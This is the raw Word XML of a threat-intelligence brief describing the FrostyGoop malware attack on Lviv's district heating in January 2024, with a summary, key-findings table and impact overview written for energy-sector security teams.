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5135yrz072i" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 2025-009</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lchpcxmaqll" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop ICS Malware Campaign - Protecting Energy Infrastructure for Future Generations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project Nightingale Intelligence</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Publisher:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> NCC Group OTCE + Dragos + Adelard</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Energy &amp; Utilities Sector Leadership and Security Teams</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> June 9, 2025</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Version:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.0</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pages:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~18</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tswj42snq9dt" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Navigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="executive-summary">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Executive Summary</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="mission-context">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mission Context &amp; Impact</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="attack-overview">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Attack Overview</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="affected-organizations">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Affected Organizations Analysis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="cross-sector-impact">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="technical-analysis">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="mitre-mapping">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 13)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="detection-response">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Detection &amp; Response</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 15)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="tri-partner">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 17)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="references">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">References &amp; Citations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 18)</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cdxb0k7kblz4" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop represents a watershed moment in industrial control system (ICS) attacks, marking the first malware to directly manipulate operational technology through the Modbus TCP protocol. This sophisticated campaign successfully disrupted heating services for over 600 apartment buildings housing 100,000 residents in Lviv, Ukraine, during sub-zero temperatures in January 2024, demonstrating the potential for cyber attacks to cause physical harm to civilian populations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jqgshl3jews5" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence 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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">First Modbus-specific ICS malware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46,000+ vulnerable ICS devices globally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hyperlink w:anchor="ref1">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[1]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">600 buildings lost heating for 48 hours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100,000 residents affected in -10°C weather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hyperlink w:anchor="ref2">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[2]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">9th known ICS-specific malware in history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Joins Stuxnet, BlackEnergy, Industroyer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hyperlink w:anchor="ref3">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[3]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploits unsecured Mikrotik routers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Initial access via exposed management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hyperlink w:anchor="ref4">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[4]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Written in Golang for Windows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Evades traditional antivirus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hyperlink w:anchor="ref5">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[5]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Targets ENCO controllers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But can affect any Modbus-enabled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hyperlink w:anchor="ref6">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[6]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Long dwell time before attack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9+ months of reconnaissance observed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hyperlink w:anchor="ref7">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[7]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_idh6qkwb6gt8" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Overview</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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident Timeframe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January 22-24,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hyperlink w:anchor="ref8">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[8]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat 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Unknown (Russian-linked suspected)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hyperlink w:anchor="ref9">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[9]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Target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Lvivteploenergo district heating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hyperlink w:anchor="ref10">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[10]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack 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Civilian infrastructure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hyperlink w:anchor="ref11">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[11]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Estimated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€2.5M recovery costs, health impacts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hyperlink w:anchor="ref12">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[12]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mission Threat 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Analysis</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligence Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: FrostyGoop demonstrates advanced operational technology knowledge and represents a significant escalation in ICS-targeted attacks. The malware's ability to manipulate industrial processes through legitimate protocols poses an existential threat to critical infrastructure globally </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[13]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[14]</w:t>
        </w:r>
      </w:hyperlink>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7miavl6iekti" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mission Context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_98pnhdmwuxru" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protecting Essential Infrastructure for Future Generations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop represents a direct assault on the infrastructure that ensures </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reliable energy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for our grandchildren. This malware's successful manipulation of heating systems during Ukraine's harsh winter demonstrates how cyber attacks can weaponize critical infrastructure against civilian populations, threatening the basic human needs for warmth and shelter. The attack's cascading effects impacted water pumping stations (threatening </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clean water</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and food storage facilities requiring refrigeration (compromising </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">healthy food</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> access) </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[15]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4hx3ojz3ys9" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strategic Implications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Energy Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Direct manipulation of energy distribution systems bypassing traditional safeguards </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref16">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053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Infrastructure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Secondary impacts on water pumping requiring electric heat tracing in winter </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref1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054">
